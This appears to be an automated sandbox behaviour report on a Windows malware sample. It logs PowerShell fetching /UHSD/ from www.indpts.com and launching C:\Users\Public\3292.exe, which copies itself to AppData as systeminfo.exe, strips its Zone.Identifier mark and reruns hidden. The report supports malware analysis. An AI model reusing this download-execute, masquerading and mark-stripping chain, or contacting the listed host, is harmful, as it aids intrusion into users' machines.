| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\Public\3292.exe | show_window = SW_SHOWNORMAL |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Info | type = Operating System |
|
6 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
10 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Release | - |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
2 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
91 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = PubLic, result_out = C:\Users\Public |
|
2 | |
| Get Environment String | name = PubLIC, result_out = C:\Users\Public |
|
2 | |
| Get Environment String | name = public, result_out = C:\Users\Public |
|
2 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = www.indpts.com, address_out = 108.163.227.35 |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.07 KB (69 bytes) |
| Total Data Received | 0.00 KB (0 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | 108.163.227.35:80 |
| Information | Value |
|---|---|
| Handle | 0x4dc |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 108.163.227.35 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 2496 |
| Data Sent | 0.07 KB (69 bytes) |
| Data Received | 0.00 KB (0 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 108.163.227.35, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 69, size_out = 69 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.07 KB (69 bytes) |
| Total Data Received | 0.00 KB (0 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | www.indpts.com |
| Information | Value |
|---|---|
| Server Name | www.indpts.com |
| Server Port | 80 |
| Data Sent | 0.07 KB (69 bytes) |
| Data Received | 0.00 KB (0 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = www.indpts.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /UHSD/ |
|
1 | |
| Send HTTP Request | headers = host: www.indpts.com, connection: Keep-Alive, url = www.indpts.com/UHSD/ |
|
1 | |
| Close Session | - |
|
1 |
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\public\3292.exe |
| Command Line | "C:\Users\Public\3292.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:28, Reason: Child Process |
| Unmonitor | End Time: 00:02:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
| Information | Value |
|---|---|
| PID | 0xb2c |
| Parent PID | 0xaec (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B30
|
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x752a0000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x759f0000 |
|
1 | |
| Load | USER32.dll | base_address = 0x75790000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x756e0000 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x45f884 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x45f8bc |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x45f92c |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x45f92c |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x45f92c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x45f92c |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x45f92c |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x45f92c |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x45f92c |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = strchr, address_out = 0x752adbeb |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x752a9894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x752a9cee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x75aa6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x75a01700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x75a2828e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x75a04435 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x75a05929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x75a23102 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x75a054ee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x75a04442 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x75a01245 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x75a014b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameA, address_out = 0x75a1b6e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameExA, address_out = 0x75a842ef |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x75a05a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x75a1eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75a011c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75a014e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x7729e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75a014c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75a011a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75a01809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75a011f8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x757bae5f |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameA, address_out = 0x7570a4b4 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Computer Name | result_out = YKyd69q, type = ComputerNameDnsHostname |
|
1 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| Get Time | type = Local Time, time = 2017-11-28 18:18:12 (Local Time) |
|
6 | |
| Get Time | type = Ticks, time = 93725 |
|
2 | |
| Get Time | type = Ticks, time = 93741 |
|
2 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
6 |
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\public\3292.exe |
| Command Line | "C:\Users\Public\3292.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:52 |
| Information | Value |
|---|---|
| PID | 0xb44 |
| Parent PID | 0xb2c (c:\users\public\3292.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B48
0x
B50
0x
B54
0x
BF0
0x
BF4
0x
BF8
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe | 120.00 KB (122880 bytes) |
MD5:
ca6f2ee0e3b7218da76d126d22f707be
SHA1: a7fc89d6b45ce712c0be6600be4a8e6de9de434d SHA256: b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4 |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\ | type = file_attributes |
|
1 | |
| Move | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe | source_filename = C:\Users\Public\3292.exe |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe:Zone.Identifier | - |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe | os_pid = 0xbfc, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x752a0000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x759f0000 |
|
1 | |
| Load | USER32.dll | base_address = 0x75790000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x756e0000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x756e0000 |
|
1 | |
| Load | ole32.dll | base_address = 0x75450000 |
|
1 | |
| Load | shell32.dll | base_address = 0x75c50000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x758d0000 |
|
1 | |
| Load | urlmon.dll | base_address = 0x76c40000 |
|
1 | |
| Load | userenv.dll | base_address = 0x74bb0000 |
|
1 | |
| Load | wininet.dll | base_address = 0x75350000 |
|
1 | |
| Load | wtsapi32.dll | base_address = 0x74b90000 |
|
1 | |
| Get Filename | - | process_name = c:\users\public\3292.exe, file_name_orig = C:\Users\Public\3292.exe, size = 260 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3bfa94 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3bfacc |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x3bfb3c |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x3bfb3c |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x3bfb3c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3bfb3c |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x3bfb3c |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x3bfb3c |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x3bfb3c |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = strchr, address_out = 0x752adbeb |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x752a9894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x752a9cee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x75aa6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x75a01700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x75a2828e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x75a04435 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x75a05929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x75a23102 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x75a054ee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x75a04442 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x75a01245 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x75a014b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameA, address_out = 0x75a1b6e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameExA, address_out = 0x75a842ef |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x75a05a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x75a1eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75a011c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75a014e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x7729e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75a014c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75a011a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75a01809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75a011f8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x757bae5f |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameA, address_out = 0x7570a4b4 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
2 | |
| Get Computer Name | result_out = YKyd69q, type = ComputerNameDnsHostname |
|
1 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| Get Time | type = Local Time, time = 2017-11-28 18:18:14 (Local Time) |
|
6 | |
| Get Time | type = Ticks, time = 95815 |
|
4 | |
| Get Time | type = Ticks, time = 97282 |
|
1 | |
| Get Time | type = Ticks, time = 102289 |
|
1 | |
| Get Time | type = Ticks, time = 103288 |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
6 | |
| Release | - |
|
1 |
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" |
